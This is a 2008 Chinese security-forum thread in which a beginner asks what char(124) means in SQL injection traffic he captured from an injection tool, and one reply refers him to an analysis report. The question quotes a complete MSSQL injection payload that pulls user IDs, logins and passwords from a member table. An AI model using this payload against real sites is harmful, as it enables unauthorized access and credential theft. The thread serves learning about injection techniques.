【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: [讨论]菜鸟问SQL注入中的小问题！ [打印本页]

作者: s37su37 时间: 2008-7-21 00:11 标题: [讨论]菜鸟问SQL注入中的小问题！

[讨论]菜鸟问SQL注入中的小问题！
议题作者：寂寞520
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

最近想学习SQL注入，于是抓包看看前辈们的注入语句，我用WinSock Expert截取了明小子注入工具的发送代码，只看懂一部分，好头大哦！%2B我知道是+ 号，但是char(124)这种是什么意思啊？我百度没到，哪位大大帮忙给菜鸟解释下好吗？

info.aspx?id=111 And char(124)%2B(Select Top 1 isNull(cast([USERID] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Loging] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PASS] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 2 [USERID],[Loging],[PASS] From [Lily]..[member] Where 1=1 Order by [USERID],[Loging],[PASS]) T Order by [USERID] desc,[Loging] desc,[PASS] desc)>0

帖子1 精华0 积分1 阅读权限40 在线时间0 小时注册时间2008-3-30 最后登录2008-4-6 查看详细资料引用报告回复 TOP 少女暴富的隐秘（图）

trace

晶莹剔透§烈日灼然

作者: 石头 时间: 2008-7-21 00:11

NBSI 注入分析跟踪报告(MSSQL篇)

百度一下，这个分析的比较好
帖子111 精华0 积分304 阅读权限40 性别男在线时间137 小时注册时间2006-4-3 最后登录2008-7-4 查看详细资料引用报告回复 TOP 让女孩一夜变的更有女人味

赵子岩
惟一

晶莹剔透§烈日灼然

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)